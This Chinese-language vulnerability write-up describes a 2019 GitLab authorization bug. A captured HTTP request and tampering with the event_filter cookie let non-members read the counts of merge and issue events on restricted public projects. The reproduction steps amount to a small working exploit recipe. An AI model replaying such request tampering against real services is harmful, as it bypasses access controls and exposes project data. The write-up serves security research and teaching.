gitlab漏洞系列-越权获取合并事件的个数

• 背景

• 复现步骤

gitlab漏洞系列-越权获取合并事件的个数

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

背景

ashish_r_padelkar于2019年提交了这个漏洞: 如果一个项目进行了如下的设置,任何项目的非成员都可以获取合并事件/issue的活动次数

非成员用户看到以下选项:

按道理来说,他们不能看到活动事件，如问题/合并事件等。然而,对他们来说,获得此类事件的计数是可能的!

复现步骤

1. 作为公共项目的所有者，将问题和存储库设置为Only project Members

2.以任何用户的身份登录并访问这个公共项目。你只会看到2个选项，all和team。

3.点击它们中的任何一个，然后在burp中查看请求。

GET /gitlabadminrsspl1111/thisispublicproject/activity?limit=20&offset=0 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Accept: application/json, text/plain, */*  
X-CSRF-Token: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36  
Referer: https://gitlab.com/gitlabadminrsspl1111/thisispublicproject  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: issue_board_welcome_hidden=true; promote_burndown_charts_dismissed=true; cycle_analytics_help_dismissed=1; _ga=GA1.2.922314095.1537686075; _mkto_trk=id:194-VVC-221&token:_mch-gitlab.com-1537686075533-44677; pipeline_schedules_callout_dismissed=true; _biz_uid=18351712817945caaf2f1d99e4ae1589; auto_devops_settings_dismissed=true; _biz_flagsA=%7B%22Version%22%3A1%2C%22XDomain%22%3A%221%22%2C%22Mkto%22%3A%221%22%2C%22Frm%22%3A%221%22%7D; _fbp=fb.1.1549094360636.1901280804; sidebar_collapsed=false; frequently_used_emojis=thumbsup%2Cart%2Cbasketball%2Cthumbsdown%2Cbicyclist_tone3%2Cbaseball; _sp_id.6b85=1-c31c-4026-821a-1-06a8-492f-b0f0-9929021a8ee4; _gid=GA1.2.973204736.1557559750; _gitlab_session=1; _biz_sid=10f6f3; _biz_nA=1113; _biz_pendingA=%5B%5D; event_filter=team  
If-None-Match: W/"1"

4.如果你在上面的请求中看到Cookie头，有一个名为event_filter的参数。它负责获取这些事件。

5.现在，要获得问题或合并事件，只需将此发送到burp repeater，并将event_filter的值更改为issue或merged。

6.响应中，你会看到{"html":"n"，"count":3},这表示合并。这意味着有3个合并事件发生在这个项目之中;